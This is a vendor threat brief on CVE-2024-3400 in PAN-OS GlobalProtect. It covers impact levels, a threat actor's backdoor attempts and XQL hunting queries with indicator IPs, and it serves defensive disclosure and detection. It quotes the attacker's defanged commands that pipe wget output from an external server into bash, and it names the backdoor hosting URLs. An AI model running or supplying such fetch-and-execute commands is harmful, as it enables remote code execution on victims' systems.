Title: Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated May 20) URL Source: https://unit42.paloaltonetworks.com/cve-2024-3400 Published Time: April 12, 2024 Markdown Content: This post is also available in: [日本語 (Japanese)](https://unit42.paloaltonetworks.jp/cve-2024-3400/) Executive Summary ----------------- **This threat brief is monitored daily and updated as new intelligence is available for us to share. The full update log is at the end of this post and offers the fullest account of all changes made.** Palo Alto Networks and Unit 42 are engaged in tracking activity related to CVE-2024-3400 and are working with external researchers, partners and customers to share information transparently and rapidly. A critical command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. The vulnerability, assigned CVE-2024-3400, has a CVSS score of 10.0. This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both). This issue does not affect cloud firewalls (Cloud NGFW), Panorama appliances or Prisma Access. For up-to-date information about affected products and versions, please refer to the [Palo Alto Networks Security Advisory](https://security.paloaltonetworks.com/CVE-2024-3400) on this issue. Additionally, [episode 21 of the Unit 42 podcast Threat Vector](https://thecyberwire.com/podcasts/threat-vector/21/notes) covers the discovery, technical details and exploitation of the vulnerability. Palo Alto Networks is aware of an increasing number of attacks that leverage the exploitation of this vulnerability. Third parties have disclosed proofs of concept for this vulnerability. We are also aware of a proof of concept including post-exploit persistence techniques that survive resets and upgrades. We are not aware of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability at this time. We are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse. The section [Current Scope of the Attack](https://unit42.paloaltonetworks.com/cve-2024-3400#post-133365-_50343o6a6han) includes information on the types of exploitation activity we have seen, as well as their relative prevalence. The vast majority of cases that Unit 42 has responded to have been unsuccessful attempts to exploit the vulnerability and some compromises of PAN-OS that are limited to confirming that the device is exploitable. Other cases have included the following activity: * Limited attempts in which a file on the hard drive has been copied to a location accessible via a web request * A very limited number of compromises that led to interactive command execution This threat brief will cover information about the vulnerability and what we know about post-exploitation activity. We will share guidance to mitigate the vulnerability, though readers should also refer to the [Security Advisory](https://security.paloaltonetworks.com/CVE-2024-3400) for specific product version information and remediation guidance. We will continue to update this threat brief as more information becomes available. If you believe your firewall has been compromised, please reach out to [Palo Alto Networks support](https://support.paloaltonetworks.com/). This issue is fixed in [hotfix releases](https://security.paloaltonetworks.com/CVE-2024-3400) of PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3 and all later PAN-OS versions. Hotfixes for other commonly deployed maintenance releases are also available. Additional guidance on mitigation for customers is available in the [Security Advisory.](https://security.paloaltonetworks.com/CVE-2024-3400) A Knowledge Base article, [How to Remedy CVE-2024-3400](https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA14u000000CrO6CAK), is available in the Customer Support Portal. As a matter of best practice, Palo Alto Networks recommends that you monitor your network for abnormal activity and investigate any unexpected network activity. We would like to thank Volexity for finding this issue and their continuing coordination and partnership. Please reference Volexity’s [blog](https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400) for their analysis. Palo Alto Networks customers receive protections from and mitigations for CVE-2024-3400 and malware used in post-exploitation activity in the following ways: Customers with a Threat Prevention subscription can block attacks for this vulnerability using Threat ID [95187](https://threatvault.paloaltonetworks.com/?query=95187), [95189](https://threatvault.paloaltonetworks.com/?query=95189) and [95191](https://threatvault.paloaltonetworks.com/?query=95191) (available in Applications and Threats content version 8836-8695 and later). [Our advisory has been updated](https://security.paloaltonetworks.com/CVE-2024-3400) with new Threat Prevention content updates for additional Threat Prevention IDs around CVE-2024-3400. To apply the Threat IDs, customers must ensure that vulnerability protection has been applied to their GlobalProtect interface to prevent exploitation of this issue on their device. Please see the relevant [LIVEcommunity article](https://live.paloaltonetworks.com/t5/globalprotect-articles/applying-vulnerability-protection-to-globalprotect-interfaces/ta-p/340184) for more information. The [Managed Threat Hunting](https://unit42.paloaltonetworks.com/cve-2024-3400#post-133365-_vgezw6a4uez) section below includes XQL queries that can be used to search for signs of exploitation of this CVE. Details of the Vulnerability ---------------------------- A command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both). Palo Alto Networks is aware of targeted attacks that leverage this vulnerability. The next section covers details of the post-exploitation activity we’ve observed. Current Scope of the Attack --------------------------- Palo Alto Networks has classified observations of attempted exploitation into several levels, from Level 0 to Level 3. In all cases we recommend following the guidance in the [Security Advisory](https://security.paloaltonetworks.com/CVE-2024-3400). **Level 0: Probe –** An unsuccessful exploitation attempt. Forensic artifacts indicate that the attempt was made to access the customer network, but the attacker did not actually succeed. Palo Alto Networks assesses there is likely _little to no_ immediate impact of a Level 0 attempt. **Level 1: Test** **– The vulnerability was being tested on the device. A 0-byte file has been created and is resident on the firewall. However, there is no indication of any known unauthorized command execution.** **Level 2: Potential Exfiltration –** A file on the device has been copied to a location accessible via a web request, though the file may or may not have been subsequently downloaded. Typically, the file we have observed being copied is running\_config.xml. **Level 3: Interactive Access** **–** There are signs of interactive command execution. This may include shell-based backdoors, introduction of code, downloading files or running commands. It is important to note that _the vast majority of cases that Unit 42 has responded to have been unsuccessful attempts to exploit the vulnerability and some Level 1 compromises of PAN-OS_. Other cases have included limited Level 2 and very limited Level 3 compromises of those targeted firewalls. UPSTYLE and Cron Job Backdoor Activity -------------------------------------- As part of the activity observed in Operation MidnightEclipse, the threat actor exploited CVE-2024-3400 to run commands on the firewall. We have determined that the threat actor initially intended to install a Python-based backdoor, which our colleagues at Volexity referred to as UPSTYLE. We believe the threat actors created UPSTYLE specifically for this campaign. However, the threat actors were unsuccessful at installing UPSTYLE after three different exploit attempts. After the third failed attempt, the threat actor decided to install a cron job backdoor to carry out their post-exploitation activities. After failing to install UPSTYLE, the threat actor was observed exploiting CVE-2024-3400 to run a handful of the commands on the firewall. The commands included copying configuration files to the web application folder and exfiltrating them via HTTP requests to those files. The following IP address was seen attempting to access a specific configuration file copied to this folder, which we believe is a VPN used by the threat actor: * 66.235.168\[.\]222 After gathering configuration files, the threat actor exploited the vulnerability to run the following command to receive additional commands from an external server in the form of a bash script: * wget -qO- hxxp://172.233.228\[.\]93/patch|bash We were unable to access the bash script hosted at this URL. However, shortly after we saw evidence of the creation of a cron job. This cron job would run every minute to access commands hosted on the same external server that would execute via bash, as seen in the following command: * wget -qO- hxxp://172.233.228\[.\]93/policy | bash We were unable to access the commands executed via this URL, but we believe this cron job-based backdoor was used to carry out the actor’s post-exploitation activities. While the threat actors were unable to install the UPSTYLE backdoor, it appears that they created it specifically for this campaign and planned on using it as the initial backdoor. Also, the reason the actors failed to install UPSTYLE included mistakes in the exploit attempts themselves, as well as trivial mistakes in the executed commands. While we have not seen UPSTYLE used in any other exploit attempts, it is possible that UPSTYLE could have been successfully installed on other devices. As previously mentioned, the threat actors attempted three unsuccessful exploit attempts to run commands to install UPSTYLE. For two of these attempts, UPSTYLE was hosted at hxxp://144.172.79\[.\]92/update.py. In the third exploit attempt, we saw the actor hosting the backdoor at nhdata.s3-us-west-2.amazonaws\[.\]com, which may suggest that the actors thought network-based protections caused the first two failed installation attempts. According to the following HTTP headers, it appears that the threat actor last modified UPSTYLE hosted at 144.172.79\[.\]92 on April 7, 2024:
Accept-Ranges: bytes Content-Length: 5187 Content-Type: application/octet-stream Date: Thu, 11 Apr 2024 16:12:16 GMT Etag: "6612443d-1443" Last-Modified: Sun, 07 Apr 2024 06:59:09 GMT Server: nginx/1.18.0 (Ubuntu) |
// Description: Search for domain IOC in raw NGFW logs dataset = panw_ngfw_url_raw | filter url_domain ~= ".*nhdata.s3-us-west-2.amazonaws.com" | fields _time, log_source_name, action, app, url_domain, uri, url_category, source_ip, source_port, dest_ip, dest_port, protocol, rule_matched, rule_matched_uuid |
// Description: Detect hits for the specific prevention signature for CVE-2024-3400 config case_sensitive = false | dataset = panw_ngfw_threat_raw | filter threat_id in (95187,95189,95191) | fields _time, log_source_name, action, app_category, app_sub_category, threat_id, threat_name, source_ip, source_port, dest_ip, dest_port, * |
// Description: Hits for known IOCs in NGFW traffic config case_sensitive = false | dataset = panw_ngfw_traffic_raw | filter source_ip in ("110.47.250.103","126.227.76.24","38.207.148.123","147.45.70.100","199.119.206.28","38.181.70.3","149.28.194.95","78.141.232.174","38.180.128.159","64.176.226.203","38.180.106.167","173.255.223.159","38.60.218.153","185.108.105.110","146.70.192.174","149.88.27.212","154.223.16.34","38.180.41.251","203.160.86.91","45.121.51.2","172.233.228.93","66.235.168.222","144.172.79.92") or dest_ip in ("110.47.250.103","126.227.76.24","38.207.148.123","147.45.70.100","199.119.206.28","38.181.70.3","149.28.194.95","78.141.232.174","38.180.128.159","64.176.226.203","38.180.106.167","173.255.223.159","38.60.218.153","185.108.105.110","146.70.192.174","149.88.27.212","154.223.16.34","38.180.41.251","203.160.86.91","45.121.51.2","172.233.228.93","66.235.168.222","144.172.79.92") | fields _time, log_source_name, action, action_source, app, bytes_sent, bytes_received, bytes_total, source_ip, source_port, dest_ip, dest_port, protocol, rule_matched, rule_matched_uuid, session_end_reason |
// Description: Hits for known IOCs in XDR telemetry and NGFW telemetry (assuming proper integration of NGFW) config case_sensitive = false | dataset = xdr_data | filter event_type = ENUM.STORY | filter dst_action_external_hostname ~=".*nhdata.s3-us-west-2.amazonaws.com" OR dns_query_name ~=".*nhdata.s3-us-west-2.amazonaws.com" OR action_external_hostname ~=".*nhdata.s3-us-west-2.amazonaws.com" OR action_remote_ip in ("110.47.250.103","126.227.76.24","38.207.148.123","147.45.70.100","199.119.206.28","38.181.70.3","149.28.194.95","78.141.232.174","38.180.128.159","64.176.226.203","38.180.106.167","173.255.223.159","38.60.218.153","185.108.105.110","146.70.192.174","149.88.27.212","154.223.16.34","38.180.41.251","203.160.86.91","45.121.51.2","172.233.228.93","66.235.168.222","144.172.79.92") | fields _time, agent_hostname, actor_process_image_name, action_local_ip, action_remote_ip, action_remote_port, dns_query_name, action_external_hostname |